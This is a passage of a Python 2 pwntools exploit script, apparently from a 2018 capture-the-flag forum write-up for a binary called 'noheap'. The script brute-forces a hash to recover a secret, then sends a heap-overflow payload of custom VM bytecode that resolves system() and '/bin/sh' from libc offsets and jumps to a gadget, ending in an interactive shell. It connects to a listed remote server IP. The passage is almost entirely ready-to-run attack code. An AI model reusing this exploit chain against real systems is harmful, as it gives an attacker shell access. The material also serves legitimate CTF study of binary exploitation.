        start = time.clock()
        ret=fn(*args, **kwargs)
        print "%s cost %s second"%(fn.__name__, time.clock() - start)
        return ret
    return _wrapper
def calc_1(v2):
    # One step of the binary's LCG (sub_108A), truncated to 32 bits.
    return (214013*v2+2531011)&0xffffffff
def mk_string(v2):
    # Rebuild the 8-byte secret s1: two consecutive LCG outputs packed as native (little-endian) DWORDs.
    v2_ret=calc_1(v2)
    #print hex(v2_ret)
    s=""
    s+=struct.pack("I",v2_ret)
    v2_ret=calc_1(v2_ret)
    #print hex(v2_ret)
    s+=struct.pack("I",v2_ret)
    #print binascii.b2a_hex(s)
    return s
def calc_2(v2_str):
    # Same hash as sub_10B2: h = 131*h + byte, 32-bit wraparound.
    #print "fuck"
    v6=0
    for x in v2_str:
        v6=(0x83*v6+ord(x))&0xffffffff
        #print hex(v6)
    #print hex(v6)
    return v6
def calc(v2):
    # (hash, secret) for a candidate seed.
    v2_str=mk_string(v2)
    v2_ret=calc_2(v2_str)
    return v2_ret,v2_str
#print calc(0x5a314f44)
@time_me
def Crack(in_value):
    # Enumerate every seed whose 4 bytes lie in [0x30, 0x30+0x2b) and return the
    # secret whose hash equals in_value. `break` only leaves the innermost loop,
    # so the outer loops keep running after a hit; this is the 7-10 s noted above.
    ret_str=""
    for i1 in range(0,0x2b):
        for i2 in range(0,0x2b):
            for i3 in range(0,0x2b):
                for i4 in range(0,0x2b):
                    v2=((i1+0x30)<<24)+((i2+0x30)<<16)+((i3+0x30)<<8)+((i4+0x30))
                    #print hex(v2)
                    v2_ret,v2_str=calc(v2)
                    #print hex(i),v2_ret,v2_str
                    if v2_ret==in_value:
                        print v2_str,binascii.b2a_hex(v2_str)
                        ret_str=v2_str
                        break
    return ret_str
sh=0
if g_local:
    sh=process("./noheap")
    raw_input("ida has attch? Press any key for continue...")
else:
    sh=remote("139.199.99.130",8989)
def get_hash(text):
    # Extract the hex digits between "Hash:" and the following newline from the banner text.
    #print text
    index1=text.find("Hash:")
    index2=text.find("\n",index1)
    #print index1,index2
    #print text[index1+5:index2]
    return text[index1+5:index2]
def add(size,context):
    # Menu option 1 ("Malloc"): send the size, then the content. Note the parameter named
    # `context` shadows pwntools' `context` inside this function.
    sh.sendline("1")
    print sh.recvuntil("Size :")
    sh.sendline(str(size))
    print sh.recvuntil("Content :")
    sh.sendline(context)
    #print sh.recv(0x200)
def free():
    # Menu option 3 ("free"); not used by test() below.
    sh.sendline("3")
    print sh.recv(200)
# Bytecode plan, kept by the author as a bare string literal (has no runtime effect).
'''
012d :var_30=2d
13 :var_38=var_40[-var_30] var_38=printf_addr+99
0127 :var_30=27
04 :var_20=vm_code[var_30] =0x0000000000010509
05 :var_38=var_38-var_20 var_38=system_addr
0107 :var_30=07
14 :var_40[-var_30]=var_38 [rsp+8]=system_addr
012f :var_30=2f
04 :var_20=vm_code[var_30] =0x00000000001479c7
06 :var_38=var_38+var_20 var_38=binsh_str_addr
0108 :var_30=08
14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr
0102 :var_30=2
13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr
0137 :var_30=37
04 :var_20=vm_code[var_30] =0x00000000000001ff
06 :var_38=var_38+var_20 var_38==rop_addr
16 :jmp var_38
local_system=0x45390
local_printf=0x55800
net_system=0x45390
net_printf=0x55800
0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509
c779140000000000:offset2 =system_addr-binsh_str_addr
ff01000000000000:offset3 =rop_arrr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff
'''
# 25 opcode bytes followed by the three little-endian qword constants (offset1/2/3) that
# opcode 04 loads from inside the bytecode itself.
vm_code ="\x01\x2d\x13\x01\x27\x04\x05\x01\x07\x14\x01\x2f\x04\x06\x01\x08\x14\x01\x02\x13\x01\x37\x04\x06\x16\x09\x05\x01\x00\x00\x00\x00\x00\xc7\x79\x14\x00\x00\x00\x00\x00\xff\x01\x00\x00\x00\x00\x00\x00"
def test():
    # Stage 1: read the banner, crack the hash, send the recovered 8-byte secret.
    wel_text=sh.recvuntil("Input:")
    #print wel_text
    hash_str=get_hash(wel_text)
    #print "xxxxx",hash_str
    #raw_input()
    print("Crack hash.........")
    str_input=Crack(int(hash_str,16))
    print "input string",str_input
    sh.sendline(str_input)
    print sh.recv(200)
    raw_input()
    # Stage 2: 0x8e bytes of filler (0x80 padding + 0xe already-executed bytes), then the
    # bytecode; size 0 is passed to the malloc option as described in the writeup.
    payload=""
    payload+='A'*0x8e
    payload+=vm_code
    raw_input()
    add(0, payload)
    #add(16,"xxxxxxxxxxxxx")
    sh.interactive()
test()
本地与服务器地址一致,直接运行即可:
此flag包含\n,只有全部复制粘贴才能提交成功,涉嫌违规。
最后于 2018-6-27 21:15
被lacoucou编辑
,原因: